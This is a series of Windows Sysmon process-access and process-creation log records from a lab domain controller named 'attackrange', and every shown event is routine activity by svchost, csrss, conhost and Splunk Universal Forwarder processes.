{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010210B0600}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010210B0600}","TargetProcessId":"4580","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.459\r\nSourceProcessGUID: {41C8662E-2039-5F25-0000-0010210B0600}\r\nSourceProcessId: 4580\r\nSourceThreadId: 4208\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.459","SourceProcessGUID":"{41C8662E-2039-5F25-0000-0010210B0600}","SourceProcessId":"4580","SourceThreadId":"4208","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.961\r\nProcessGuid: {41C8662E-2039-5F25-0000-0010FB0C0600}\r\nProcessId: 4500\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.961","ProcessGuid":"{41C8662E-2039-5F25-0000-0010FB0C0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010FB0C0600}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010FB0C0600}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010FB0C0600}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010FB0C0600}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\